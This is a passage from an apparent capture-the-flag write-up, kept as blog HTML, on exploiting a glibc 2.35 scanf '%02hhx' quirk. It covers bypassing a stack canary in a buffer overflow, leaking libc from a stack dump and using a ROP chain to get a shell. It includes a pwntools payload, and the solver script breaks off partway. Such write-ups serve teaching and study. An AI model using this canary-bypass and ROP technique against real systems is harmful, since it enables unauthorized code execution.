fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>scanf Specifications and How to Exploit Them</h3>\n<p>In glibc 2.35, which this challenge binary uses, <code class=\"language-text\">scanf</code> is implemented as follows.</p>\n<p>This function internally uses <code class=\"language-text\">__vfscanf_internal</code> and returns its <code class=\"language-text\">done</code> value.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">__scanf</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>format<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  va_list arg<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> done<span class=\"token punctuation\">;</span>\n\n  <span class=\"token function\">va_start</span> <span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">,</span> format<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  done <span class=\"token operator\">=</span> <span class=\"token function\">__vfscanf_internal</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> format<span class=\"token punctuation\">,</span> arg<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">va_end</span> <span class=\"token punctuation\">(</span>arg<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n  <span class=\"token keyword\">return</span> done<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/bminor/glibc/blob/glibc-2.35/stdio-common/scanf.c\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">glibc/stdio-common/scanf.c at glibc-2.35 · bminor/glibc</a></p>\n<p>The <code class=\"language-text\">vfscanf-internal.c</code> file is roughly 3,000 lines long, and honestly I did not feel like reading all of it, but I did notice several places where <code class=\"language-text\">++done</code> is executed in code that appears to perform reads.</p>\n<p>Since <code class=\"language-text\">scanf</code> returns the number of items successfully read, it also seems likely that the lines immediately before <code class=\"language-text\">++done</code> are where the actual reads occur.</p>\n<p>Reference: <a href=\"https://github.com/bminor/glibc/blob/glibc-2.35/stdio-common/vfscanf-internal.c\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">glibc/stdio-common/vfscanf-internal.c at glibc-2.35 · bminor/glibc</a></p>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man3/scanf.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">scanf(3) - Linux manual page</a></p>\n<p>For <code class=\"language-text\">scanf</code>, when the input does not match the format string, it returns an input error and leaves the offending data in the input stream.</p>\n<p>I verified this locally with the following program: when a character that does not match the format is entered, it remains in <code class=\"language-text\">stdin</code> afterward.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">100</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">int</span> ret<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">for</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> <span class=\"token number\">9</span><span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token char\">'-'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">for</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> <span class=\"token number\">9</span><span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    ret <span class=\"token operator\">=</span> <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token operator\">+</span>i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"BUF ==> %c\\n\"</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"RET ==> %d\\n\"</span><span class=\"token punctuation\">,</span> ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Below is the state of <code class=\"language-text\">stdin</code> after entering a character that does not match the format.</p>\n<p>You can see that the character I entered remains in <code class=\"language-text\">stdin</code> even after calling <code class=\"language-text\">scanf</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 673px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABcklEQVQoz5WS2XKrMBBERwKM2HcECCGwjZ2l8v+f1xlwKrmv96FrRFEcdfdAX22Ld6WgsxR60EiSGAPPLEtARP+vrCzgTRP8vkeoQkyzwX2/o2o6kAwgPJb0IISAJ18fSfmS53mngiA437+gx4GBwlqI2ULpHnnVI+mviGqLuN0QNVfkeYLbTNANYRkJK8u5GXaxqJv6hL6Avg8xMnDdQNsGwfCkbBA3K+LuilQ/kI4fyPiS1UhYTbAD4fPG0KXG/nhwVT0KTvoHnGcIM5+TWKooEFczO3PscjmhqphgtI91Ikwd4enYoQm5nh2aU7Vt8wPkDk6YMaBjDgPS6nC4IWGHhw6HUd7BjeJ0NzLwbWWnpmSHT8zWoKzKf4DOcYcLR77icmy6HDjujaEO6fDk846uTXC3BNMT3jfCvrDL5w2LW1By3L8OGUi9BmkWu5NccJzXiCre/CWGDBRv+oLwIhAGhMAnqJD4maeKTpCU8ve3+Qb4RrpQfQt/9AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1d58e8437122aa643893f813f375cf03/8ac56/image-20240822203003245.webp 240w,\n/static/1d58e8437122aa643893f813f375cf03/d3be9/image-20240822203003245.webp 480w,\n/static/1d58e8437122aa643893f813f375cf03/b8cf5/image-20240822203003245.webp 673w\"\n              sizes=\"(max-width: 673px) 100vw, 673px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1d58e8437122aa643893f813f375cf03/8ff5a/image-20240822203003245.png 240w,\n/static/1d58e8437122aa643893f813f375cf03/e85cb/image-20240822203003245.png 480w,\n/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png 673w\"\n            sizes=\"(max-width: 673px) 100vw, 673px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1d58e8437122aa643893f813f375cf03/c391c/image-20240822203003245.png\"\n            alt=\"image-20240822203003245\"\n            title=\"image-20240822203003245\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>You can also see that when invalid input causes an error, the buffer is not overwritten.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 815px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 65.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQ4y62TyW7EIBBEAS+YHYxj+zSZ2DNKZv3/v6swRJFyTx9KLbrEU3UL2HpIcHMHv/SwuYXUHZRN0H6EcgmDDbVqN9ae9vnHs7F4ETaMkIOE8w5SSrBt22G0hTUOjLH/62M7wjpbxTgB8OvyCR88Yox0CY0xUErRANd1gdaaDrif9jryKyUJ8PG8YykppynTJQwl4esdkQBP5x1pTPDe0wDvjxvmZUbORCNfbxdMbxNSSjTA9+Oh7jBEh1ZyND0H56L8Gg7RdGj7AVyIoqZeqLV4v2dRvL/Abyk1D53TEmFqAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/8ac56/image-20240822213806022.webp 240w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/d3be9/image-20240822213806022.webp 480w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/0ea8f/image-20240822213806022.webp 815w\"\n              sizes=\"(max-width: 815px) 100vw, 815px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/8ff5a/image-20240822213806022.png 240w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/e85cb/image-20240822213806022.png 480w,\n/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png 815w\"\n            sizes=\"(max-width: 815px) 100vw, 815px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2f4c4dec95f1ec863aa4b3bd734c0c9d/ef916/image-20240822213806022.png\"\n            alt=\"image-20240822213806022\"\n            title=\"image-20240822213806022\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>An interesting detail here is that sign characters such as <code class=\"language-text\">+</code> and <code class=\"language-text\">-</code> can be interpreted as hexadecimal input, but they do not satisfy the <code class=\"language-text\">%02hhx</code> format and therefore cause an input error. This lets us consume data from the input stream while skipping <code class=\"language-text\">scanf</code>’s write into the buffer.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 809px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 79.58333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4UlEQVQ4y62S646DIBSE0UShchUs7kWqra37b9v3f7lZsPsGnh8TTiD5MocZNj08fOIYrgL91EB5DuVGmOELOnxA9WM+P/e53Nnz9y7ty1uEy7OxDsYYhBDAtscGrQy0NGCsymLHFMcIITg4b1FV7Dhw+9ngnIO1NgMJHM7LBUopSCmPw4rSJaHruh1I4jClKTuUOJ0EjcN5mXPkeheJw/V+g+vfPSIBxnhG27ZomoZm5eWaV7aGzuH7D80eDE1tcsoyw0oXyWpTgIKqNut9/XdIVOzn6xfDEOB9j7quDwP/AOq4TSKJqMfTAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/756bf78ae3f98af7d497892f3ea08105/8ac56/image-20240822214140557.webp 240w,\n/static/756bf78ae3f98af7d497892f3ea08105/d3be9/image-20240822214140557.webp 480w,\n/static/756bf78ae3f98af7d497892f3ea08105/f996b/image-20240822214140557.webp 809w\"\n              sizes=\"(max-width: 809px) 100vw, 809px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/756bf78ae3f98af7d497892f3ea08105/8ff5a/image-20240822214140557.png 240w,\n/static/756bf78ae3f98af7d497892f3ea08105/e85cb/image-20240822214140557.png 480w,\n/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png 809w\"\n            sizes=\"(max-width: 809px) 100vw, 809px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/756bf78ae3f98af7d497892f3ea08105/e80ac/image-20240822214140557.png\"\n            alt=\"image-20240822214140557\"\n            title=\"image-20240822214140557\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Because this challenge fills the buffer one byte at a time using the code below, we can exploit this behavior to use the buffer overflow without overwriting the canary bytes.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">void</span> <span class=\"token function\">get_hex</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>buf<span class=\"token punctuation\">,</span> <span class=\"token keyword\">unsigned</span> size<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">for</span> <span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> i <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span> i <span class=\"token operator\">&lt;</span> size<span class=\"token punctuation\">;</span> i<span class=\"token operator\">++</span><span class=\"token punctuation\">)</span> <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%02hhx\"</span><span class=\"token punctuation\">,</span> buf <span class=\"token operator\">+</span> i<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<h3 id=\"bypassing-the-canary\" style=\"position:relative;\"><a href=\"#bypassing-the-canary\" aria-label=\"bypassing the canary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bypassing the Canary</h3>\n<p>Based on the above, I successfully bypassed the canary with the following payload.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">payload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span><span class=\"token punctuation\">,</span>\n    <span class=\"token string\">b\"42\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x100</span>\n<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span> <span class=\"token operator\">+</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0x100</span><span class=\"token operator\">//</span><span class=\"token number\">2</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>After that, all that remained was to build a working ROP chain and get a shell.</p>\n<h3 id=\"leaking-libc\" style=\"position:relative;\"><a href=\"#leaking-libc\" aria-label=\"leaking libc permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Leaking libc</h3>\n<p>To get a shell with ROP, I next needed a way to leak a libc address.</p>\n<p>At first I considered leaking it via ROP, but looking more carefully, the line <code class=\"language-text\">printf(\"%02hhx \", (unsigned char)buf[i]);</code> simply prints the contents of the stack.</p>\n<p>Using this, I was able to obtain the address of <code class=\"language-text\">libc_start_main_ret</code> from the dumped stack.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/91b29/image-20240822223143349.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 70.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACr0lEQVQ4y01UR5LbMBDUwV5JzGICCQaRYFZOtk/a9QfWW2X//y3tGUje8qELpCg0Ogw56/oWTdtANQp936HrWvBvw9AjyySiLMX1sMMl9/C9DrGVCYYkQSN9qEIgC2sEVojA9eG6DmZVXaGnzUzSfRJ2GMYe5bqAHfhIyxwydpHGKyTCR7wK4dN1KnKUooPthFg6KUxbYNaQsnEaNIbxsY60brYTqmqNubmEk7iI2xR+HsOSHizfxsq34C0NRPM5XFoNw9SYtWSX1TDRP2WjJh5Rqwov5gKbcYPr6YKxH3HcnSBlBCEX8IREqHr4awVRtZBpSYRd86nwE09CpWpN2HYdps2EpmkwTROECBDES2R+hC7JkUUJgfIOyDJnx3+eiGDajJqIwZZVU2NuLVEUBdmvqKQMda0Qhj4RGvBMEwHZDQwDocG2l5ipZ4Y6v2eGTat0SUVZkMI5OJZJK65QE3EYesjXlK1rYMlElqlhEWblusRjdJS2yJsZPEp5nuGrsaAp2GJ/uKAfd/BWApbjoGgcKqmiKUhg2VSU5cEkzLhJLuJ/8AH90Ok5dIIVjqcb3U/oG4FeeajKFUSaQZYNBJGaTzJNKGnTmlSuibgmhaW+LlGSXSFiBCLE/X7H6bjHaTLx4/CC08alXCtqVSCOQm3VpDwtwqygoeXw2WJR5HqY+Z5tc4ZBEuH19Y7b9Yx9b+C6+UKrSSUpxHGIiAht2yJC40HIbwrPGytiAilTDY6CD2DL3bBDXtAhSmLsEqhaolIj5RmTzdUDNiN4tHw47LHb73C+nLHdbTU558jWFzaNRRAhSSRO5xs9PxIOqGpWmCBJJXw/JIUWWad3+fbtit9/fuP91zs+Pj7w9vMNrJrLeRCaiESBdd1jf7xptW2/hWonek4fkELR+ESkztf4C2M3eE9+Ylu5AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/8ac56/image-20240822223143349.webp 240w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/d3be9/image-20240822223143349.webp 480w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/e46b2/image-20240822223143349.webp 960w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/b4d37/image-20240822223143349.webp 983w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/8ff5a/image-20240822223143349.png 240w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/e85cb/image-20240822223143349.png 480w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/d9199/image-20240822223143349.png 960w,\n/static/95b1d4c822050d70da8f5d481a5e6bd1/91b29/image-20240822223143349.png 983w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/95b1d4c822050d70da8f5d481a5e6bd1/d9199/image-20240822223143349.png\"\n            alt=\"image-20240822223143349\"\n            title=\"image-20240822223143349\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"exploit\" style=\"position:relative;\"><a href=\"#exploit\" aria-label=\"exploit permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploit</h3>\n<p>After successfully bypassing the canary and leaking a libc address, I exploited the buffer overflow to execute a ROP chain, obtained a shell, and then got the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 870px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 95.83333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAABfklEQVQ4y61U2W7CQAxcjpAg0iSACoQj1+YE0v7/1009RnlqpUrtPliz62PWsR0b2zRo2wb90GEYeuz3O5wvZ6TpCYfDu57DMMRyuYTv+/A8D6vVSs9EFZ/oIQgCmK7v0AhhUeSCNXgf7r1g+8KuRds1aJpa0dZWsEUtd8YxGerLqhSdhalspc68VLZEnmeoxFiUuTgVQlBpIG30IyF9SUAb/emXnlONM7W+3Kow0MoDDCjKQiWTgFyyJyEDq4moyFALOZEyfaGx4jjch1fKNbN8ZTQRUkcbg1jnUnT8xOf4wO12xUlqfbletNZE04kySmLMZjPM53MtPguvKIXmmcg7hT7UsSnGmO/C4pPsR+NfhPVwSyg1S5JE58kJ4f0x4O0tdJfhx+eoHXJGOI5PHUpnhJwxjoLDLludK2eEnENnHabwN1osFu4Ie9mBTgc7kw77wbQsvf83qJO1c5UFwf2XZTccjwdEUYTNZiPbe49kmyCOY+x2W6zX618JvwA7x6oLLc+7nAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/8ac56/image-20241019203747179.webp 240w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/d3be9/image-20241019203747179.webp 480w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/bf818/image-20241019203747179.webp 870w\"\n              sizes=\"(max-width: 870px) 100vw, 870px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/8ff5a/image-20241019203747179.png 240w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/e85cb/image-20241019203747179.png 480w,\n/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png 870w\"\n            sizes=\"(max-width: 870px) 100vw, 870px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f3086f97ba0da8ad5a00a0fe4b6e4f9f/3f3b9/image-20241019203747179.png\"\n            alt=\"image-20241019203747179\"\n            title=\"image-20241019203747179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The final solver I wrote is shown below.</p>\n<p>One thing that tripped me up was that when I tried to overwrite the buffer via <code class=\"language-text\">scanf(\"%02hhx\", buf + i);</code>, giving input such as <code class=\"language-text\">22134000</code> somehow caused it to be written as <code class=\"language-text\">02 02 13 40</code>.</p>\n<p>Separating the input values with spaces made it parse them correctly.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\ncontext<span class=\"token punctuation\">.</span>terminal <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"/mnt/c/Windows/system32/cmd.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"/c\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"start\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wt.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-w\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"0\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"sp\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-s\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\".75\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-d\"</span><span class=\"token punctuation\">,</span> 